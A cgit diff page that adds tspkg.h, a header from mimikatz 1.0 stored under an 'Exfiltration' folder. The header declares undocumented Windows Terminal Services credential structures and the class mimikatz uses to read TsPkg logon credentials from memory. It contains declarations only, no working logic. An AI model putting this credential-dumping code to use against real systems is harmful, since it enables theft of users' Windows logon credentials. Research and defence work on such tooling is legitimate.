aboutsummaryrefslogtreecommitdiff
path: root/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.h
diff options
context:
space:
mode:
Diffstat (limited to 'Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.h')
-rw-r--r--Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.h37
1 files changed, 37 insertions, 0 deletions
diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.h
new file mode 100644
index 0000000..35a3b15
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.h
@@ -0,0 +1,37 @@
+/* Benjamin DELPY `gentilkiwi`
+ http://blog.gentilkiwi.com
+ benjamin@gentilkiwi.com
+ Licence : http://creativecommons.org/licenses/by/3.0/fr/
+ Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#pragma once
+#include "../mod_mimikatz_sekurlsa.h"
+
+class mod_mimikatz_sekurlsa_tspkg {
+
+private:
+ typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
+ PVOID unk0; // lock ?
+ KIWI_GENERIC_PRIMARY_CREDENTIAL credentials;
+ } KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;
+
+ typedef struct _KIWI_TS_CREDENTIAL {
+ #ifdef _M_X64
+ BYTE unk0[108];
+ #elif defined _M_IX86
+ BYTE unk0[64];
+ #endif
+ LUID LocallyUniqueIdentifier;
+ PVOID unk1;
+ PVOID unk2;
+ PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
+ } KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;
+
+ static PRTL_AVL_TABLE TSGlobalCredTable;
+ static bool searchTSPKGFuncs();
+
+public:
+ static mod_process::PKIWI_VERY_BASIC_MODULEENTRY pModTSPKG;
+ static bool getTsPkg(vector<wstring> * arguments);
+ static bool WINAPI getTsPkgLogonData(__in PLUID logId, __in bool justSecurity);
+};
generated by cgit v1.2.3 (git 2.39.1) at 2025-05-29 02:07:08 +0000